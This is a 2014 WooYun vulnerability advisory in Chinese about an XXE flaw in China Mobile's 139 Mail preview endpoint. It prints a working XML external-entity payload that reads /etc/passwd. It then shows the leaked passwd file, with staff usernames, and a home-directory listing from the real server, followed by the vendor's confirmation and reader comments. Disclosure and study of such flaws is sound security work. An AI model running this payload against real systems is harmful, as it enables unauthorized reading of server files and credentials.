当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074048

漏洞标题:139邮箱XXE漏洞可读取文件

相关厂商:10086.cn

漏洞作者: 路人甲

提交时间:2014-08-27 14:41

修复时间:2014-10-11 14:42

公开时间:2014-10-11 14:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-11: 细节向核心白帽子及相关领域专家公开
2014-09-21: 细节向普通白帽子公开
2014-10-01: 细节向实习白帽子公开
2014-10-11: 细节向公众公开

简要描述:

139邮箱XXE漏洞可读取文件

详细说明:

/opes/preview.do 输入处理不当可以通过sid取回文件内容
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE ANY [
<!ENTITY all SYSTEM "file:///etc/passwd">
]>
...
<string name="sid">&all;</string>
...

漏洞证明:


/etc/passwd:
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
mailattr:x:550:550::/home/mailattr:/bin/bash
oracle:x:551:551::/home/oracle:/bin/bash
opes:x:500:500::/home/opes:/bin/bash
richlogall:x:55561:55561::/home/richlogall:/sbin/nologin
laibin:x:55562:55562::/home/laibin:/bin/bash
zhougx:x:55563:55563::/home/zhougx:/bin/bash
liuyq:x:55564:55564::/home/liuyq:/bin/bash
huangmp:x:55565:55565::/home/huangmp:/bin/bash
wenjj:x:55566:55566::/home/wenjj:/bin/bash
tanlinzhi:x:55567:55567::/home/tanlinzhi:/bin/bash
/home/opes:
.bash_history
.bash_logout
.bash_profile
.bashrc
.emacs
.lesshst
.mozilla
.ssh
.viminfo
.Yozo_Office
.zshrc
logs
maila
nfsmailattachment
nfsmailattachment01
nfsmailattachment02
nfsmailattachment03
opesconfig
printerName.sh
RealTimeSave
Temp
tmp
tomcat
Yozo_FileConvertLog.txt
Yozo_Office
Yozo_Officelog.txt

修复方案:

要修复找永中

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-09-01 09:37

厂商回复:

CNVD确认所述情况,已经转由CNCERT通报给中国移动集团公司处置,对于XXE漏洞,虽然不新鲜,但实例还是比较难发现,rank 14

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-27 14:55 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    关注,虽然不用移动

  2. 2014-08-27 15:40 | Destinys ( 路人 | Rank:11 漏洞数:5 | Focus web security)

    屌飞了

  3. 2014-08-27 16:52 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    读取任意文件吗